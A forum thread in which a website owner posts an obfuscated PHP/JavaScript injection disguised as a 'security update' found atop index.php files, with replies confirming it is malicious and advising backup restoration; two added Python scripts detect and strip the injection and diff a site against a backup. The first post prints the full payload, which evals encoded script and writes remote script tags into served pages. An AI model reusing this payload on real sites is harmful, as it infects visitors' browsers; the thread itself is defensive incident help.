
Thread: I don't know PHP... but...

  1. #1

    I don't know PHP... but...

    This is at the beginning of some important pages such as index.php in the customer and admin areas. Is this a malicious script? It looked to me like it was not supposed to be there, especially given the comment claiming that it's a "security patch".

    Am I right in calling "Bull$#!t"?

    PHP Code:
    <?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">var $a="Z63cZ3dZ225nZ2567Z2574h;iZ252b+)Z257bZ2574mpZ253dZ2564sZ252eslZ2569ce(Z2569,Z2569Z252b1)Z253bZ22;cdZ3dZ22stZ253dstZ252bSZ2574riZ256eg.Z2566roZ256dCZ2568Z2561rCZ256fdeZ2528(Z2574Z256dZ2570.Z22;ceZ3dZ22cZ2568arCZ256fdeAZ2574Z25280)Z255e(Z25270xZ2530Z2530Z2527+Z2565s)Z2529);Z257d}Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sz|Z25Z25;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;stZ3dZ22Z2573Z2574Z253dZ2522Z2524Z2561Z253dsZ2574Z253bZ2564Z2563sZ2528dZ2561+Z2564bZ252bdZ2563+Z2564dZ252bdZ2565,Z2531Z2530Z2529;Z2564wZ2528sZ2574)Z253bZ2573tZ253d$Z2561Z253bZ2522;Z22;czZ3dZ22Z2566uncZ2574ioZ256e Z2563z(cZ257a)Z257brZ2565turZ256eZ2520caZ252bZ2563b+Z2563Z2563+cdZ252bce+Z2563z;Z257d;Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;dzZ3dZ22Z2566uZ256ectiZ256fn dZ2577(Z2574)Z257bcaZ253dZ2527Z252564ocuZ25256dZ252565ntZ25252eZ252577rZ252569Z2574Z2565(Z252522Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ252569pt 
Z25256caZ256eZ252567uZ252561Z25256Z2537Z252565Z25253dZ25255cZ252522javZ2561sZ252563rZ2525Z25369Z252570Z252574Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fsZ2563Z2572Z252569Z2570Z252574Z25253eZ2527;Z2577indZ256fw[Z2522eZ2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522](unescapeZ2528t)Z2529Z257dZ253bZ22;cbZ3dZ220e(Z2564Z2573Z2529;stZ253dtmZ2570Z253dZ2527Z2527;for(iZ253d0Z253biZ253cds.Z256cZ256Z22;caZ3dZ22Z2566Z2575nZ2563tZ2569on Z2564cZ2573Z2528dsZ252cZ2565Z2573)Z257bdsZ253dunZ2565scaZ257Z22;deZ3dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;opZ3dZ22Z2524Z2561Z253dZ2522dw(Z2564Z2563Z2573(cuZ252c1Z2534)Z2529;Z2522;Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050Z22;Z69Z66 
Z28dZ6fcuZ6dZ65ntZ2eZ63oZ6fZ6bieZ2eindZ65xOZ66Z28Z27rf5f6Z64sZ27)Z3dZ3d-1)Z7bfunctiZ6fnZ20cZ61Z6clbaZ63k(Z78)Z7bwinZ64ow.Z74w Z3d xZ3bvaZ72 d Z3dZ20nZ65wZ20DaZ74e()Z3bd.Z73etZ54imeZ28Z78[Z22as_Z6ffZ22]*1Z3000)Z3bZ76Z61r hZ20Z3d Z64Z2egetZ55TCZ48Z6fursZ28);wZ69nZ64oZ77Z2eh Z3d hZ3bif Z28hZ20Z3e 8)Z7bdZ2esZ65tUTZ43DaZ74e(Z64.gZ65tZ55TCZ44ateZ28Z29 -Z202Z29Z3b}elZ73Z65Z7bd.Z73eZ74UZ54Z43DZ61tZ65(dZ2egetZ55TCZ44ateZ28Z29 - Z33);Z7dZ77inZ64Z6fwZ2eZ67Z64 Z3d Z64;vZ61Z72 tZ69me Z3d Z6eew Z41Z72rZ61Z79Z28Z29Z3bvZ61Z72 sZ68Z69Z66tIZ6eZ64eZ78 Z3d Z22Z22;timZ65[Z22yeaZ72Z22] Z3d dZ2egZ65Z74UTCZ46Z75llZ59eaZ72Z28);tZ69meZ5bZ22Z6doZ6ethZ22] Z3d d.Z67eZ74UZ54CZ4donZ74hZ28)+Z31;tZ69Z6de[Z22daZ79Z22]Z20Z3d d.gZ65tUZ54CDaZ74e()Z3biZ66 Z28dZ2egeZ74Z55Z54CZ4dZ6fnZ74hZ28)+1Z20Z3c 1Z30)Z7bshiftZ49nZ64Z65x Z3d Z74imeZ5bZ22yearZ22] Z2bZ20Z22-0Z22 Z2bZ20Z28Z64.gZ65Z74UTCZ4doZ6ethZ28Z29+1Z29;}Z65lsZ65Z7bshZ69ftZ49Z6edeZ78 Z3d timZ65[Z22yearZ22]Z20+Z20Z22-Z22Z20+ (Z64Z2egeZ74Z55Z54CZ4doZ6etZ68(Z29+1Z29;}iZ66 (dZ2eZ67etUZ54CZ44atZ65() Z3c 10Z29Z7bshiZ66tIZ6eZ64exZ20Z3dshiftZ49ndeZ78 +Z20Z22-0Z22 +Z20d.gZ65tZ55TCZ44atZ65(Z29;}Z65lseZ7bZ73hifZ74InZ64eZ78 Z3d Z73hZ69ftZ49ndeZ78Z20+ Z22-Z22 + d.gZ65tZ55TZ43DZ61tZ65Z28);Z7ddoZ63umeZ6et.wZ72iteZ28Z22Z3cscrZ22Z2bZ22ipt laZ6eguaZ67Z65Z3djavaZ73crZ69Z70tZ22+Z22 srZ63Z3dZ27http:Z2fZ2fsearchZ2eZ74Z77iZ74tZ65Z72.Z63omZ2fZ74rZ65nZ64sZ2fdZ61iZ6cyZ2ejZ73oZ6e?daZ74Z65Z3dZ22+ shiftZ49ndeZ78Z2bZ22&caZ6clZ62Z61Z63kZ3dcZ61Z6cZ6cZ62ackZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} functZ69Z6fn Z63aZ6clZ62Z61Z63kZ32(Z78)Z7bwZ69ndZ6fw.Z74Z77 Z3d x;Z73Z63(Z27rf5Z66Z36Z64Z73Z27Z2c2,7Z29;eZ76al(Z75Z6eesZ63apeZ28dzZ2bZ63Z7aZ2bop+Z73t)Z2bZ27dw(dZ7aZ2bcZ7a(Z24aZ2bstZ29Z29;Z27);dZ6fcZ75mZ65nZ74Z2ewriZ74e(Z24a);Z7ddZ6fcumZ65Z6etZ2ewrZ69teZ28Z22Z3cimgZ20srcZ3dZ27htZ74pZ3aZ2fZ2fsearch.Z74witZ74er.Z63oZ6dZ2fimageZ73Z2fZ73Z65aZ72cZ68Z2frss.pZ6egZ27Z20wiZ64Z74Z68Z3d1 Z68eZ69gZ68Z74Z3d1 sZ74yleZ3dZ27viZ73Z69bZ69lZ69tyZ3ahidZ64enZ27 Z2fZ3e Z3cscrZ22+Z22ipt 
lZ61ngZ75ageZ3djZ61Z76Z61scZ72iZ70tZ22+Z22 srcZ3dZ27hZ74tp:Z2fZ2fseaZ72Z63Z68Z2eZ74wiZ74Z74erZ2ecoZ6dZ2ftreZ6edsZ2fZ64aiZ6cy.jZ73onZ3fZ63Z61llZ62Z61cZ6bZ3dcalZ6cbaZ63kZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elsZ65Z7b$aZ3dZ27Z27};funcZ74Z69oZ6e sZ63(cZ6emZ2cv,Z65Z64Z29Z7bvarZ20exdZ3dZ6eewZ20Z44aZ74e(Z29Z3bexdZ2esetZ44ateZ28exdZ2egZ65Z74DZ61teZ28)+Z65Z64);dZ6fcumZ65Z6et.cZ6foZ6biZ65Z3dZ63Z6em+Z20Z27Z3dZ27 +esZ63apZ65Z28v)Z2bZ27;expirZ65sZ3dZ27+exd.toGZ4dTSZ74Z72ingZ28);Z7d;";var ez=window;ez[String.fromCharCode(101,118,97)+"l"](fds()); function asd(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}function fds(){return asd($a);}</script>';}//important security update ?>
    <?php 
    /*Packed BLOB icon data. Corruption may result script execution errors. Don't touch it unless you know what you are doing.*/  ?>
    Analog = Classical
    Digital = Techno

  2. #2
    westin (Gonzo District BOFH). Join Date: Jan 2006. Location: SW MO. Posts: 1,187
    I googled: "<?php ob_start('security_update'); function security_update", and from the replies, it looks like it is malicious.
    "Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink."

    -HST

  3. #3
    The-Spec (Banned). Join Date: Jan 2008. Posts: 605
    pwned.

  4. #4
    Quote Originally Posted by The-Spec:
    pwned.
    Yah, thanks for that wise and insightful comment. lol.


    So Westin, is there somewhere you may know of where I can find a list of all files that were installed, and figure out a way to "undo" all of this? I haven't tried googling it yet, and I suspect I'll find all the info I need eventually... but I'm wondering if anyone here may know of some resources that give me the exact "damage", so that I can spend more time correcting the problem than finding all the effects.

    So far I've manually removed all those lines of code from each affected PHP file I found on the site, but I'm assuming there's probably a backdoor somewhere. I wish I had a Python "find and replace" type script that I could use to clean all instances of this code from all the files in a folder. I think I have one lying around that I could modify for that purpose. But... that doesn't take care of the backdoors.
    Analog = Classical
    Digital = Techno
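    A defender-side version of the find-and-replace script wished for above: it walks a web root, flags every .php file carrying the injected prologue posted in #1, copies each original into a quarantine directory (so the evidence for the "how did they get in" question survives) and only then strips the block. This is an added example, not code posted by anyone in the thread or taken from any project; the marker strings (`ob_start('security_update')`, `//important security update ?>`, the "Packed BLOB icon data" comment) come from the snippet in post #1, while the function names, the quarantine layout and the sample files in `demo()` are this example's own constructions.

```python
"""Scan a web root for the injected ob_start('security_update') prologue and strip it.

Added example for this thread, not code posted in it. Marker strings are taken
from the snippet in post #1; function names, quarantine layout and sample files
are constructed here.
"""
import re
import shutil
import tempfile
from pathlib import Path

# The injected prologue opens with ob_start('security_update') and closes with the
# comment "//important security update ?>", optionally followed by a second
# <?php ... ?> block disguised as "Packed BLOB icon data". Non-greedy DOTALL matching
# spans the obfuscated payload in between without having to decode it.
INJECTION_RE = re.compile(
    r"<\?php\s*ob_start\('security_update'\);.*?//important security update\s*\?>"
    r"(?:\s*<\?php\s*/\*Packed BLOB icon data\..*?\*/\s*\?>)?",
    re.DOTALL,
)

# Constructed sample files: a stand-in for the posted payload with a placeholder
# body (same framing as the real thing), and a clean file.
LEGIT = "<?php\n// legitimate application code (constructed)\necho 'hello';\n"
SAMPLE_INFECTED = (
    "<?php ob_start('security_update'); function security_update($buffer){return "
    "$buffer.'<script language=\"javascript\">var $a=\"PLACEHOLDER_PAYLOAD\";"
    "</script>';}//important security update ?>\n"
    "<?php \n/*Packed BLOB icon data. Corruption may result script execution errors. "
    "Don't touch it unless you know what you are doing.*/  ?>\n"
    + LEGIT
)


def find_injection(source: str) -> bool:
    """True if the file content carries the injected prologue."""
    return INJECTION_RE.search(source) is not None


def strip_injection(source: str) -> tuple[str, int]:
    """Return (cleaned_source, number_of_injected_blocks_removed)."""
    cleaned, count = INJECTION_RE.subn("", source)
    if count:
        # The prologue sat at byte 0 of each file in the thread; drop the blank
        # line it leaves behind so the legitimate <?php opens the file again.
        cleaned = cleaned.lstrip()
    return cleaned, count


def clean_tree(root: Path, quarantine: Path, dry_run: bool = False) -> dict:
    """Walk root, clean every matching *.php file, keep originals under quarantine."""
    report = {"scanned": 0, "infected": [], "cleaned": []}
    for path in sorted(root.rglob("*.php")):
        report["scanned"] += 1
        source = path.read_text(encoding="utf-8", errors="surrogateescape")
        if not find_injection(source):
            continue
        rel = path.relative_to(root)
        report["infected"].append(rel.as_posix())
        if dry_run:
            continue
        dest = quarantine / rel
        dest.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(path, dest)  # untouched original, mtime included, for forensics
        cleaned, _ = strip_injection(source)
        path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
        report["cleaned"].append(rel.as_posix())
    return report


def demo() -> dict:
    """Build a throwaway web root with one infected and one clean file, then clean it."""
    base = Path(tempfile.mkdtemp(prefix="phpclean-"))
    root, quarantine = base / "htdocs", base / "quarantine"
    (root / "admin").mkdir(parents=True)
    (root / "index.php").write_text(SAMPLE_INFECTED, encoding="utf-8")
    (root / "admin" / "index.php").write_text(LEGIT, encoding="utf-8")
    report = clean_tree(root, quarantine)
    report["index_now_clean"] = (root / "index.php").read_text(encoding="utf-8") == LEGIT
    report["original_quarantined"] = (
        (quarantine / "index.php").read_text(encoding="utf-8") == SAMPLE_INFECTED
    )
    shutil.rmtree(base)
    return report


if __name__ == "__main__":
    print(demo())
```

    Run `clean_tree(root, quarantine, dry_run=True)` first to get the list of affected files, then without `dry_run` to rewrite them. The regex only recognises this exact prologue; anything else the intruder left behind will not match, which is why a pattern clean is a stopgap rather than a substitute for restoring from a trusted backup.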

  5. #5
    westin (Gonzo District BOFH). Join Date: Jan 2006. Location: SW MO. Posts: 1,187
    Really, if you have backups, I would rm -rf the whole thing, and load from backup. Only way to be sure. Make sure you check the integrity of your backups though, and patch man... patch. Depending on how it was exploited, you might want to do some code audits. There are automated tools, or if you are really brave, submit the URL here, and I am sure there are some members that would be happy to run some tests on it. Like my friend above...
    "Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink."

    -HST
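    If a backup from before the compromise exists, the check the reply above asks for (is the backup intact, and what else changed on the live site?) can be done by hashing both trees and diffing them: anything added on the live side that the backup never had is either a legitimate change since the backup or something the intruder dropped, which is exactly the backdoor question from #4. This is an added example, not code from the thread or any project; it assumes the backup is available as a directory tree, and the function names and the sample trees built in `demo()` are constructed here.

```python
"""Compare a live web root against a known-good backup: added, removed, modified files.

Added example for this thread, not code posted in it. Assumes the pre-compromise
backup is unpacked as a directory; function names and sample trees are constructed.
"""
import hashlib
import shutil
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large uploads do not have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root: Path) -> dict[str, str]:
    """Map every regular file under root (POSIX-style relative path) to its SHA-256."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in root.rglob("*")
        if p.is_file()
    }


def compare(baseline: dict[str, str], live: dict[str, str]) -> dict[str, list[str]]:
    """Classify differences between a trusted baseline snapshot and the live snapshot.

    Read 'added' first: a file the backup never had is either a legitimate change
    made since the backup or something that was dropped on the server.
    """
    added = sorted(set(live) - set(baseline))
    removed = sorted(set(baseline) - set(live))
    modified = sorted(p for p in set(baseline) & set(live) if baseline[p] != live[p])
    return {"added": added, "removed": removed, "modified": modified}


def diff_trees(backup_root: Path, live_root: Path) -> dict[str, list[str]]:
    """Snapshot both trees and compare them."""
    return compare(snapshot(backup_root), snapshot(live_root))


def demo() -> dict[str, list[str]]:
    """Constructed backup and live trees: one file tampered, one dropped, one removed."""
    base = Path(tempfile.mkdtemp(prefix="treediff-"))
    backup, live = base / "backup", base / "htdocs"
    for root in (backup, live):
        (root / "admin").mkdir(parents=True)
        (root / "images").mkdir()
        (root / "admin" / "index.php").write_text("<?php echo 'admin';\n")  # unchanged
    (backup / "index.php").write_text("<?php echo 'home';\n")
    # Live copy carries an injected prologue (constructed stand-in, not the real payload).
    (live / "index.php").write_text(
        "<?php ob_start('security_update'); /* ... */ ?>\n<?php echo 'home';\n"
    )
    (backup / "README.txt").write_text("constructed sample\n")  # gone on the live side
    # A PHP file where only images belong: the kind of 'added' entry worth a close look.
    (live / "images" / "thumb.php").write_text("<?php /* constructed sample */\n")
    result = diff_trees(backup, live)
    shutil.rmtree(base)
    return result


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

    The comparison is only as good as the baseline: the backup has to predate the break-in and come from storage the intruder could not reach, otherwise a tampered backup simply agrees with the tampered site. Files under `modified` are where the injected prologue will show up; files under `added` are where to look for anything it hides.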

  6. #6
    Member. Join Date: May 2003. Location: Somewhere in Texas. Posts: 76
    Don't overlook the fact that they made it there in the first place. More important than fixing the damage right now is to concentrate on finding out how they got in: fix that *then* figure out what else they did...
